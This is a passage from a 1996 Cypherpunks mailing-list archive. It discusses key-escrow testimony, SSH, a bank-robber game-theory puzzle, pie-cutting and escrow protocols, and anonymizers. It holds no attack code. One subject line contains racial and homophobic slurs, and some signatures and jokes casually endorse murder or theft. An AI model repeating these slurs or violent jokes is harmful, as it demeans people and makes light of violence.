H79SphU71m4boGm3Uw2/sRpu/p4Wye5S+TUTkzqNlOzIY71LI/3lnVFX6lDZjLVD
YEBVdmULMkmF/fHHQopOIdR95zxC64HPHHtSEmZvjwiod7jDwl0WVQ==
=08/O
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jul 1996 13:22:07 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Freeh Testimony 7/25/96
Message-ID: <199607270244.TAA16229@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:08 PM 7/26/96 -0400, David Lesher wrote:

>Further, the more interesting aspects were what Freeh said under
>interactive questioning by the Senators. He artfully avoided
>many of their direct questions, but found himself on the rocks
>on others.
>
>He seemed rather surprised at the tenor & thrust of the questioning;
>He could not have thought this would be a cake-walk but he sure
>acted that way.

Here's a question I'd like somebody to ask Freeh:


"There are some people who believe the development of uncompromised good 
encryption and easy communication, represented by the Internet, will lead to 
a world with drastically less _need_ for government, and a world that will 
be essentially ungovernable by centralized governments.  You are a 
representative of government, first and foremost.  Your job and salary and 
pension may be on the line if these predictions are true.  To what extent is 
your position on key-escrow/GAK designed to resist or prevent such an 
eventuality?"


(He'll probably answer that he doesn't understand the question..."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 27 Jul 1996 13:19:04 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Usenet Conference on Security
In-Reply-To: <199607262252.PAA03209@netcom8.netcom.com>
Message-ID: <199607270034.UAA24175@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> While the Department of Justice guy (whose name slips my mind) was saying 4
> horsemen over and over (really an oversimplification of his position), Data
> Fellows Ltd., Paivantaite 8, FIN-02210 ESPOO, Finland
> (http://www.datafellows.com) was in the vendor area offering strong crypto
> products with the line in one of their handouts, "This is orders of
> magnitude more security than DES-based or US products that are under the US
> ITAR export restrictions."  In talking with them I didn't smell any snake
> oil.

As an aside, the stuff Datafellows is selling is, I believe, a
commercial version of SSH, which is very good stuff. Its a full
replacement for the whole berkeley "r" utilities using strong crypto
(public key and conventional) for authentication and privacy. Does
rlogin, rsh, redirects X sessions, slices and dices, etc. Really
spiffy.

(SSH suffers from a few minor flaws, but they will likely be corrected
in the future; the only thing that worries me about it is that it is
very large and thus hard to fully analyse, but it looks good enough
that I've been using it day to day for many many months for all my
medium security work.)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 27 Jul 1996 08:01:19 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Bare fibers
In-Reply-To: <199607260854.BAA23997@toad.com>
Message-ID: <Pine.LNX.3.94.960726205520.1142D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jul 1996, Bill Stewart wrote:

> Pressurized conduit is a favorite paranoid technique - if the 
> Bad Guy cuts open the conduit to get at the fiber, your alarm
> system notices the pressure drop and goes off.
> For slightly less paranoid scenarios, you can use heavy narrow
> conduit with epoxied joints, and the extra alarm wire or two
> to help detect cutting.  For substantially more paranoid types,
> you can always fill your conduit with some sort of flammable
> substance that reats with air...

for that matter, string fibers in bundles as such
      _
    _/ \_
   / \_/ \
   \_/ \_/
   / \_/ \
   \_/ \_/
     \_/

where the middle one carries the real signal, and the outer ones cary fake
signals, and use them for interruption detection.

 --Deviant
Legalize free-enterprise murder: why should governments have all the fun?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfkxiTAJap8fyDMVAQFRBgf+NmGLsJnPRQdJTgyb+7EBwQsqy7hlDAzZ
MKC1cuQY6Z4UfVBO3PR5BTygKLRp2bjhH8DIiLKP5ILk3rh8ujVfE4qlFtdQj7t0
Mq4MO5x5EmBx4fQxJfzLshPBUlkjh7jBZ9y/VQVdpWmNrf++js913O4VGQwXRI0Y
9pf3P3UaPqtgkcCmTnxmaCFgxAr5l1gwSPEcmNDmx8AfhZBd2Od/3/v6xsO2uxCz
yWV3b1X5i2DxKVjx4aWlqH9uvfn8dJSw9Efi0UAnA1vX5Hn2OGufYyI05MHXsEUf
Cutjtd3q/s5OSrXkAN8hjZrQ2m/34wqhtowHZ2bFJIX/vsi5hk8c1Q==
=8r2J
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Sat, 27 Jul 1996 20:13:52 +0800
To: "'WIN95-L@eva.dc.LSOFT.COM>
Subject: Off Topic: Send e-mail to post to Usenet
Message-ID: <01BB7BE8.26667AA0@ip66.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


How can I send e-mail to post my message to the Usenet without using the NNTP server of my ISP? I say this because my ISP's news server is not working 100% correctly, if not, it is not 100% dependable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sat, 27 Jul 1996 08:33:53 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: [Noise] Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <199607260854.BAA24001@toad.com>
Message-ID: <Pine.LNX.3.94.960726210541.1142E-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Jul 1996, Bill Stewart wrote:

> Date: Fri, 26 Jul 1996 01:52:43 -0700
> From: Bill Stewart <stewarts@ix.netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Twenty Bank Robbers -- Game theory:)
> 
> At 11:35 PM 7/25/96 -0500, ichudov@algebra.com (Igor Chudov) wrote:
> >In my initial post that caused all the turmoil I said (literally) this:
> >``Twenty cypherpunks robbed a bank.''
> >        ^^^^^^^^^^^^^
> >I was careful choosing words.
> 
> That was my reaction as well.  I'd assume that if twenty cypherpunks
> rob a bank, either it's one of Eric's party games (:-), or else 
> they probably conspired over the net to rob a bank by computer.
> 
> 1) The bank probably knows which bank got robbed.

But not how much money was taken, or from which accounts.

> 2) The public probably won't hear about it.
> 3) The cypherpunks might or might not.

Not all of them anyway.

> 4) The number and identity of the cypherpunks is unknown,
>         both to each other and to the bank.

Although, the cypherpunks probably know how many, just not who.  That or
they know some of the names, but can't prove it, and don't know if there
are more.

> 5) If all twenty bank-robbing cypherpunks do conspire to
>         get together in a room to split up the loot,
>         it's probably a chat-room or mud-room;
>         it's not likely to be physical space.

Definatly.

> 6) It's very hard to kill people whose identities you don't know
>         across a net that obscures their physical location as well.

True.

> 7) I suppose you could kill-file them, which does cut them out
>         of the voting process, and therefore probably out of the money,
>         but is certainly less drastic than shooting them.

But that doesn't, unless _everybody_ did it.

> 8) Besides, how do you tell who's first on the list when they're
>         all nyms anyway?
> 9) Who's got the money, anyway?  Was there some sort of secret-sharing
>         protocol to make sure that the one cypherpunk holding the loot
>         doesn't just telnet to Argentina.com with it?

The money is in a numbered account, and will be transfered equaly to other
numbered accounts.

> 10) Money? What money?

heh.

> 11) How do they conduct the voting?  Merely arguing over the voting
>         protocols could occupy megabytes of list bandwidth.

Sence nobody knows who's involved anyway, its really a matter of who
controls the numbered account.

> 12) They could just decide to use the money to pay the winner of
>         a lottery to predict when somebody shoots Jim Bell.
> 13) But that wouldn't really take much, so there's still a lot left over.
> 14) N>10 of the twenty are really all Tentacles, so they can all
>         vote to shoot any non-Tentacle and then vote to split the
>         cash between themselves.  
> 15) They could even killfile one or two Tentacles just to make it look
>         like a fair process.
> 16) I _knew_ we shouldn't have killfiled Lieutenant Niedermeyer!
> 17) Seventeen is the mystical number.
> 18) If the public _does_ hear about it, the bank's stock will drop
>         like a rock, and they can use the money to buy out the bank.
> 19) It's mine, mine, all mine!
> 20) Bang!
> 

Hrmmm....

 --Deviant
The Macintosh is Xerox technology at its best.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfk2wjAJap8fyDMVAQEzoAf+K9Q0/reRj+PD69dEEmFg9GoSBVv4bFBf
5SERy9WeOxVXICeA0fXPBGA/cDvhzedKJ9TasV9x1GmXUX17twtaj2hbrG5CMQyD
jRybHOh8/uLBTGfcb+hf0HuHRHYkeJ9kmFJlX0g9LzKcWWmev4N270oUd/NoLlpn
Xv1rxvjxga42n8G5w1g3Yo/SYJnnzEEHv5K2GIV2HyNnRq53UQKtnFlK4SV5Qgxg
Mh7kunrec+KwNLAAwCl81iCAqjE2jzBYYxTTbQK3COiKRT3Ld8z6H6pIqkDBdXTw
L6hZvuFTfh1Sgjy+BiE+oNFhKHg8idZIiSOzIX1pUGAqGI0BVUB1OA==
=F6fC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 27 Jul 1996 14:50:18 +0800
To: cypherpunks@toad.com
Subject: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <199607270433.VAA28441@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
CAN TRACK YOU DOWN AND CLOSE THIS LIST.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <rollo@artvark.com> (Rollo Silver)
Date: Sat, 27 Jul 1996 14:40:24 +0800
To: cypherpunks@toad.com
Subject: Pie cutting algorithm
Message-ID: <v03007803ae1f2dddab21@[206.183.203.4]>
MIME-Version: 1.0
Content-Type: text/enriched

Tim May said:
<< ObCrypto Sidebar: The "fair" method for dividing a pie between two people
is well-known: "You cut, I choose." This *game theory* result is central to
many cryptographic protocols (though it may not always be apparent at
first). And the protocol can be extended to 3 parties, and proabably to N.
Research is ongoing on this, including Cypherpunk Robin Hanson's work at
Caltech. >>

I (RS) believe Claude Shannon proposed the following N-person pie-cutting algorithm more than 25 years ago:

Persons 1...N are seated around a circular table. A Thing To Be Shared (Call it a "pie") sits in front of P1 (Alice, if you prefer).

P1 cuts a slice (a portion satisfactory to her) out of the pie -- the "current slice" -- and offers the whole pie with the current slice to the person P2 (Barbara, if you like) to her left for her consideration. It is possible that P1 is so greedy that she makes the whole pie the current slice.

P2 does one of 2 things:
A. P2 cuts a smaller slice (a portion satisfactory to her, which becomes the new current slice) out of the old current slice and offers the whole pie with the new current slice to P3.
B. P2 passes (being unwilling to settle for a smaller slice of the pie than the current slice), offering the person P3 to her left the whole pie with the current slice for her consideration;

P3 does one of 2 things:
A. P3 cuts a smaller slice (a portion satisfactory to her, which becomes the new current slice) out of the old current slice and offers the whole pie with the new current slice to P4.
B. P3 passes (being unwilling to settle for a smaller slice of the pie than the current slice), offering the person P4 to her left the whole pie with the current slice for her consideration;

...

Eventually, someone (Pm, or Morticia) has cut a current slice, and everybody else has passed. At that point Pm gets the piece she cut, leaves the table with it, and (if N > 2) the game proceeds ab initio with N-1 people and the remaining pie. If N = 2 (two people were playing), there's now one person left (Winnie), and she gets the remaining pie.

The whole procedure terminates, with everyone satisified, after a finite number of steps.

Tim May: as a Licensed Ontologist, do you know who made the wiseassed (but deep) remark "Ontology recapitulates Philology"? or for that matter, "Oncology recapitulates Proctology".
Rollo Silver / Amygdala | e-mail: rollo@artvark.com
216M N. Pueblo Rd, #107 | Website: http://www.artvark.com/artvark/
Taos, NM 87571 USA      | Voice: 505-751-9601; FAX: 505-751-7507




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 28 Jul 1996 03:05:57 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Nerds, Dykes, Niggers, Dweebs, Fags, Bimbos, and Geeks
In-Reply-To: <ae1e61d70302100416ec@[205.199.118.202]>
Message-ID: <v03007803ae1f505adc1b@[17.219.102.4]>
MIME-Version: 1.0
Content-Type: text/plain


Igor asks:

>OK, I am a foreigner. Can anyone explain me what the word "geek" means
>and what are the origins of this word?

Originally, it referred to a carnival sideshow character who killed
chickens by biting off their heads.

It now means a social misfit, and we all know that computer programmers
have no normal life.

Don't ask why I'm online at 10 PM Friday night.

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Jul 1996 15:20:27 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: HACKER REPORT
Message-ID: <Pine.SUN.3.91.960726215253.16311A-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Just saw part I of a two-part series on "hackers" being broadcast
by a local San Francisco TV station.  Nothing horrible, in my
opinion.  The adroitly sidestepped the hacker/cracker distinction
by saying the "hacker" has come to mean..." and then gave the
negative, intrusive definition.

The interviewed a spokesman for "InsWeb" an on-line insurance
company that has been the target of "hackers."  During the filmed
segment, they did a trace-route on the intrusion which lead back
to Germany.

The explained "social engineering" and showed how a hacker could
get someone to reveal their password.  They also interviewed a
San Jose computer crime cop named Keith Lowery.  He didn't add
much to the discussion.

At the end, Pete Wilson (the TV guy, not the governor) said
something like, "Hackers tells us that the problem may be 
overblown.  Most people--and this includes most hackers--know 
the difference between right and wrong."

Tomorrow's show should be more interesting (and possibly much
more sensationalistic).  Part II is "The Hacker Underground."
Oooh, scary!


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 27 Jul 1996 15:25:16 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
Message-ID: <Pine.SUN.3.91.960726221034.16311C-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

anonymous-remailer@shell.portal.com wrote:

> ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI

> I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL
> HACKERS AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI
> IMMEDIATELY SO THAT THEY CAN TRACK YOU DOWN AND CLOSE THIS LIST.

Damn!  What were we thinking?  We left that "who cypherpunks" back 
door open on majordomo@toad.com.  Now "they" are going to come and
get us all.  Curses!  Foiled again!

And they say there is no legitimate use for 'ludes.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 26 Jul 1996 21:56:02 +0800
To: david@sternlight.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <v03007805ae1e24c262c7@[192.187.162.15]>
Message-ID: <199607261026.WAA12047@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight <david@sternlight.com> wrote:

   No. Robber 18 knows that he will be killed under those
   circumstances, so he proposes that Robber 20 gets all the money. 20
   votes with him. Now iterate backwards. If, under my assumption the

If there are 3 robbers, #1 can work out any split he likes that gives
a portion of the money to #3, since #3 knows he won't see a cent
unless he goes along with it.  If he chooses not to give anything to
#3, #3 loses nothing but may decide to kill him out of spite.

In the case of 4 robbers, #1 could decide to split the money with #3
or #4.  #3 will vote with him if he chooses #3 because he won't get
anything otherwise.  #4 will vote with him if he chooses #4, because
#4 knows that he has no choice but to agree with anything #2 decides,
and on the assumption that the proposer at each round wishes to
maximize his share, he'll offer #4 less than #1 did.  (In this case,
#3 has nothing to lose, so he may vote with 1 and 4, but it doesn't
matter)

Iterating backwards from here to the case of N robbers, #1 only has to
offer any floor((N-1)/2) of robbers #3..#N any amount in order to get
their votes.

   proposers are selected by lot at each stage, then 18 still knows
   he'd be killed, but not knowing which of 19 or 20 is the next
   proposer, suggests 19 and 20 split 50-50. Since each knows that he
   might be #20 and get nothing on the next round, they accept.  Now
   iterate that one backwards.

In this case, 18 will be killed anyway if the other two are willing to
bet their half of the money on being next in line.  It's possible that
for N robbers, all of them will vote against the proposer at every
stage until one of them ends up with all the money.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
#define BITCOUNT(x)     (((BX_(x)+(BX_(x)>>4)) & 0x0F0F0F0F) % 255)
#define  BX_(x)         ((x) - (((x)>>1)&0x77777777)                    \
                             - (((x)>>2)&0x33333333)                    \
                             - (((x)>>3)&0x11111111))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 26 Jul 1996 21:43:34 +0800
To: jimbell@pacifier.com
Subject: Re: Fireworks expected, missed at Senate crypto hearing
In-Reply-To: <199607260744.AAA23283@mail.pacifier.com>
Message-ID: <199607261051.WAA12127@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> wrote:

   >The FBI's Louis Freeh kept mouthing the same tired old line: "No
   >reasonable person can envision a lawless information superhighway."

   I guess that makes me an unreasonable person!

"The reasonable man adapts himself to the world; the unreasonable one
persists in trying to adapt the world to himself.  Therefore all
progress depends on the unreasonable man."

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
No matter how subtle the wizard, a knife in the shoulder blades will
seriously cramp his style.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 26 Jul 1996 21:46:12 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Defeating "Perp Profile" Analyses Of Written Materials
In-Reply-To: <199607260508.WAA08515@dfw-ix4.ix.netcom.com>
Message-ID: <199607261105.XAA12145@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


JonWienk@ix.netcom.com wrote:

   [Begin English Translation of Spanish Text]

   At home, 24 Jul 1996, JMKELSEY@[ [delphi.com]] he/she/it/you wrote:
    "I don't make have messages of the[ [remailer]] equal very-chained anony=
   mous=20
   letter protect my identity of attackers something wealthy persons and cer=
   tain,=20
   if I/he/she/it/you did many anonymous posts.  Style of the writing and al=
   one=20
   topic would take in the list of the suspect to a governable number."

John Young obviously uses this technique regularly :-)

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
"Who cares if it doesn't do anything?  It was made with our new
Triple-Iso-Bifurcated-Krypton-Gate-MOS process ..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 27 Jul 1996 16:19:57 +0800
To: cypherpunks@toad.com
Subject: The Four Horsemen Go to the Olympics!
Message-ID: <2.2.32.19960727061522.00d86d78@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, there was an explosion at the Olympics...  It may have been a bomb or
it may have been a transformer.

Expect this to be used as fuel as to why every one in America must be under
constant survelance by the Government.

The Four Horsemen are now an Olympic Event!
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 27 Jul 1996 12:29:27 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: www.anonymizer.com
Message-ID: <199607262318.QAA01690@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Bill Stewart <stewarts@ix.netcom.com>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from Bill Stewart <stewarts@ix.netcom.com> 07/25/96 11:38pm -0700

= <<<<>>>> 
= * Frames, for instance, do bizzare things when anonymized, at least 
= with Netscape 3.0b5.  Frames are, of course, _evil_, and are banned 
= by the CDA, and anyone who uses them should be flamed mercilessly 
= and forced to use Lynx on a 24x80 monochrome display until he or she 
= repents and sees the error of their ways, and if that doesn't work 
= they should be exiled to AOL with only Microsoft Word Internet Assistant. 
= But that's a flame for another day.... 
= <<<<>>>> 
=  

	I did not realize you were sadistic --or is this possibly
    latent masochism?

	my aggravation is the commercial hosts want to know all --we
    do not wish to give them our all...

	maybe an easier solution on anonyminity would be to establish
    a _plausible_ ID for www.anonymizer.com sites.  make sure the 
    target receives as much information as, say Netscape, might give 
    them...  So what if time, inc. collects 5000 cases of Bill Stewart
    at some host which anonymizer creates.

	your point on matching security levels is valid; anonymizer 
    needs to report the difference in security levels to you --you 
    make the decision. --send a very simple response form at connect 
    time showing the parameters, and you make the decision.  this,
    of course, would be a reasonable idea in all cases so you have
    a solid idea oj just who are connected to --fun if both ends are
    anonymized!



---
Cyberspace is Our Freedom!  Fuck Their CDA!
  Democracy Requires Free Speach & Strong Cryptography





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jul 1996 16:45:19 +0800
To: cypherpunks@toad.com
Subject: Re: LIMBAUGH ON TV  [Political Rant]
Message-ID: <199607270636.XAA15627@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:27 PM 7/25/96 -0400, hallam@Etna.ai.mit.edu wrote:
>The moral point is not that there is risk of being caught, it
>is that society has made laws and unless there are exceptional
>circumstances it is a duty to obey those laws.

I haven't seen society making laws recently; I've seen
societies tolerating governments and governments making laws,
generally to benefit one special interest or another, and I include 
bureaucratic growth and self-preservation as special interests.
I don't see how duty attaches to any of that.  Duty attaches
to keeping committments you've made to other people and
living up to your moral values, and in spite of government
telling me I've got a duty to it, I don't.

Meanwhile, society is a bunch of individuals and the interactions 
they have with each other.  If you want society to work well,
there are lots of things you can and should do to help - 
but duties are to individuals.  Letting other people live their
lives in peace may count as a duty - and if it does, then
governments have the duty not to make laws unless there are
exceptional circumstances.  The facts that people can lose money
gambling or get stoned by taking drugs or make money by helping
other people do these things are certainly not exceptional...

>I don't argue against breaking laws which are immoral, indeed 
>I am still refusing to pay a Poll tax bill from the UK despite
>the fact that the amount outstanding is inconsequential.

Why?  Aside from the fact that Maggie and the Parliament were
quite obnoxious in enacting and implementing it, what's wrong?
If you're think that some people's Fair Share of the cost of
supporting society is higher than others', and object because
this tax




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jul 1996 17:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: LIMBAUGH ON TV  [Political Rant]
Message-ID: <199607270636.XAA15632@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:27 PM 7/25/96 -0400, hallam@Etna.ai.mit.edu wrote:
>The moral point is not that there is risk of being caught, it
>is that society has made laws and unless there are exceptional
>circumstances it is a duty to obey those laws.

I haven't seen society making laws recently; I've seen
societies tolerating governments and governments making laws,
generally to benefit one special interest or another, and I include 
bureaucratic growth and self-preservation as special interests.
I don't see how duty attaches to any of that.  Duty attaches
to keeping committments you've made to other people and
living up to your moral values, and in spite of government
telling me I've got a duty to it, I don't.

Meanwhile, society is a bunch of individuals and the interactions 
they have with each other.  If you want society to work well,
there are lots of things you can and should do to help - 
but duties are to individuals.  Letting other people live their
lives in peace may count as a duty - and if it does, then
governments have the duty not to make laws unless there are
exceptional circumstances.  The facts that people can lose money
gambling or get stoned by taking drugs or make money by helping
other people do these things are certainly not exceptional...

>I don't argue against breaking laws which are immoral, indeed 
>I am still refusing to pay a Poll tax bill from the UK despite
>the fact that the amount outstanding is inconsequential.

Why?  Aside from the fact that Maggie and the Parliament were
quite obnoxious in enacting and implementing it, what's wrong?
If you're think that some people's Fair Share of the cost of
supporting society is higher than others', and object because
this tax treats everyone equally, the Politically Correct way
to protest it would seem to be to pay _more_ tax because you're
a well-paid technical person, not to pay _less_ tax because
factory workers can't afford to pay as much as you....


>You sound like an 18th century fop challenging someone to a duel.
Hey, an armed society is a polite society, and since you're
being rude calling him a fop, he obviously ought to blow you away :-)
(Just because I believe in the right to own weapons doesn't mean
I have to _like_ the things or the arguments gun nuts make .....)


>Would you believe that Continental is so lame that they do not
>offer either the Sci-Fi channel nor the comedy channel in the
>home town of MIT and Harvard? If I had realised that NBC 
>Olympic coverage would be as bad as it is I might have got a
>satelite dish to pick up the feed from Astra.

But Phil - Cable TV Regulation is the Law!  It's the government
helping protect you from dig-eat-dog competition!  It's your _duty_
to watch government-enforced-monopoly TV and _like_ it!
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 27 Jul 1996 16:35:48 +0800
To: cypherpunks@toad.com
Subject: Gambling Protocols
Message-ID: <199607270636.XAA15637@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>If Phil really believes he and I are at any credible legal risk 
>>for a making such a personal wager, he is a fool. 

The obvious approach is for some kind person to send encrypted 
email to both Phill and Sandy and offer to hold their digicash in escrow.
What kind of protocol would it take to implement this correctly?  
The escrow agent needs to verify that the e-money is good 
(though not necessarily where it came from), and perhaps put some
kind of lock on it to prevent double-spending by the bettors.  
The bettors need to be able to verify that the escrow agent hasn't
ripped them off.  (The escrow agent may have a certain amount
of reputation with the two players, but may not be in a regular
escrow business so he may be willing to rip them off, unlike a bank
which probably doesn't want to risk its reputation.  In a typical
betting-escrow situation today, the escrow agent doesn't need
much reputation because he's right there while the two bettors
are arm-wrestling, shooting pool, trying to out-drink each other,
or whatever, so he can't really abscond.)

Non-payer-anonymous double-spender-identifying e-money would be one 
approach - if the escrow agent rips them off, he's traceable,
and if one of the bettors double-spends, he gets fingered.
Perhaps the escrow agent should deposit the money (and a key)
with the bank and get back an encrypted set of money and a certificate
saying the encrypted money is worth $X (which lets you use
basic Chaumian first-spender-wins e-money.)

Any better approaches?
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 26 Jul 1996 22:54:50 +0800
To: gary@systemics.com
Subject: Re: Twenty Bank Robbers -- Game theory:)
In-Reply-To: <31F89692.167EB0E7@systemics.com>
Message-ID: <199607261138.XAA12217@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


Gary Howland <gary@systemics.com> wrote:

   > No. Robber 18 knows that he will be killed under those circumstances, so he
   > proposes that Robber 20 gets all the money. 20 votes with him. 

   I think many are assuming that the cypherpunk making the suggestion
   gets a vote.  My reading of the puzzle is that he does not.

I hadn't thought of that.  If the proposer gets no vote, and assuming
he still gets counted to make up 50%, for N > 3, he should suggest
giving some money to the penultimate ceil(N/2) robbers.  In the case
of N <= 3, the last robber gets everything.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Fine day to work off excess energy.  Steal something heavy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shaun Clark <jacquard@teleport.com>
Date: Sat, 27 Jul 1996 17:17:16 +0800
To: cypherpunks@toad.com
Subject: Questions...
In-Reply-To: <v03007803ae1f2dddab21@[206.183.203.4]>
Message-ID: <31F9C0A5.4BA4@teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello, I would rather I not be too blunt, but despite my generous interest in computer
 hacking cracking, and other such related topics, I have come to be confused by the
 mailer, can I ask any questions that I wish, or am I limited by some type of header
 subject?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 27 Jul 1996 15:20:25 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Bernstein files for partial summary judgement in crypto
In-Reply-To: <199607270022.RAA09976@mail.pacifier.com>
Message-ID: <199607270513.AAA08975@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
